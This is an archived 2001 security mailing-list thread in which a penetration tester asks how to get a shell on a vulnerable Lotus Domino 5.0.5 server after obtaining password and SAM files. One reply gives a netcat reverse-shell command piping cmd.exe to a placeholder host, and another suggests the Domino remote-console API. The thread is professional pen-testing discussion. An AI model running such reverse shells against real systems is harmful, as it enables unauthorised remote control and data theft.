Re: Hacking Lotus Domino 5.0.5

From: jjore@imation.com
Date: 10/16/01


Subject: Re: Hacking Lotus Domino 5.0.5
Message-ID: <OFCDE30BFB.5DD9D42C-ON86256AE7.0057ECBF@imation.com>
From: jjore@imation.com
Date: Tue, 16 Oct 2001 11:07:48 -0500

You could also hack up a quick binary using the published API. For
simplicities sake, just use the NSFRemoteConsole function. You'll be able
to demonstrate how an attacker that controls the OS also has complete
control (and without needing to resort to dirty tricks either) over the
Domino server.

Josh

Function : Server

NSFRemoteConsole - Issues a console command to a server.
----------------------------------------------------------------------------------------------------------

#include <nsfdb.h>

STATUS LNPUBLIC NSFRemoteConsole(
        char far *ServerName,
        char far *ConsoleCommand,
        HANDLE far *hResponseText);

Description :

| This function is used to issue a console command to a server from an API
program or from an API server add-in program.

If you do not have remote access to the server an error will be returned.
To have remote access to a server, you must be listed in the Server
Document Administrator Access field or in the ADMIN_ACCESS variable in the
server's notes.ini.

NOTE: If you use this function to shut down a server (by entering the
"exit" or "quit" commands), you may receive an error code of "Server not
responding" or "Remote system no longer responding". Assuming that the
server was active when you issued the command, these errors usually mean
that your command was successful (the server shuts down before it can
return a meaningful response).

NOTE: This function will return NOERROR if the server's disk is full, but
the returned response buffer will be 0-length.

"'ken'@FTU" <franklin_tech_bulletins
10/15/01 06:33 PM

 
        To: renato.ettisberger@ch.pwcglobal.com
        cc: PEN-TEST@securityfocus.com
        Subject: Re: Hacking Lotus Domino 5.0.5

I suspect from your email that your Domino server is on an NT box as
opposed to an AS/400.

If it's a 400 your somewhat out of luck because few, if any, tools exist
for 400 hacking.

If its NT here's an idea:
  If you can place a file on the machine put netcat on the machine.You
can then get a shell back with the command: nc foo.com [your inbound
port] | cmd.exe | nc foo.com [your outbount port]
you can now send commands to your inbound port and watch the result on
your out bound port.

You can always search for buffer overflows. If one is found you could
possibly excute commands, or do other stuff, within the server's
permission level.

Hope this helps.

'ken'

renato.ettisberger@ch.pwcglobal.com wrote:

> Hi
>
> I'm doing a pen test for a client. They have many systems in the dmz,
> including some nt/win2k boxes running IIS. Unfortunately, all IIS are
> patched :-(. But I found a vulnerable Domino 5.0.5 Server. I was able to
> download some nice files like names.nsf, the sam-file in winnt/repair
and a
> admin.nsf with all user names and passwords. I think, that's a finding
:-),
> but I want more.
> Is there a way to get a shell? I'm able to create files on the server or
at
> least I can fill out a question form. Can I use this to create a file or
> execute a command (I don't think so, but maybe...)? Or does anybody know
> some other stuff, that I can do?
>
> As you can see, I'm not a pro in Lotus Domino.
>
> Thanks for your help
>
> regards
> Renato
> ----------------------------------------------------------------
> The information transmitted is intended only for the person or entity to
> which it is addressed and may contain confidential and/or privileged
> material. Any review, retransmission, dissemination or other use of, or
> taking of any action in reliance upon, this information by persons or
> entities other than the intended recipient is prohibited. If you
received
> this in error, please contact the sender and delete the material from
any
> computer.
>
>
>
----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/
>
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please
see:
https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



Relevant Pages

  • Re: dcdiag - advertising errors on newley promoted domain controller
    ... Can you do the following on uksccmads01 ... The problem may actually have nothing to do with the new server but the ... From a command prompt try and see if you get any additional info ... Skipping site UK-CCM, this site is outside the scope ...
    (microsoft.public.windows.server.active_directory)
  • Re: dcdiag - advertising errors on newley promoted domain controller
    ... Can you do the following on uksccmads01 ... The problem may actually have nothing to do with the new server but the ... Active Directory Forest Replication GUIDs Found: ... From a command prompt try and see if you get any additional info ...
    (microsoft.public.windows.server.active_directory)
  • Re: dcdiag - advertising errors on newley promoted domain controller
    ... Default Server: uksccmads01.jw-uk.jameswalker.co.uk ... Output from dnslint on uksccmads01: No erros found, ... Active Directory Forest Replication GUIDs Found: ... From a command prompt try and see if you get any additional info ...
    (microsoft.public.windows.server.active_directory)
  • Re: dcdiag - advertising errors on newley promoted domain controller
    ... Both forward and reverse zones and server records have the correct IP ... Once you have found the error then on both servers, from a command prompt, ... Skipping site UK-CCM, this site is outside the scope provided by ...
    (microsoft.public.windows.server.active_directory)
  • Re: dcdiag - advertising errors on newley promoted domain controller
    ... Then change the secondary DNS to the other site DNS server. ... Skipping site UK-CCM, this site is outside the scope provided ... command line arguments provided. ...
    (microsoft.public.windows.server.active_directory)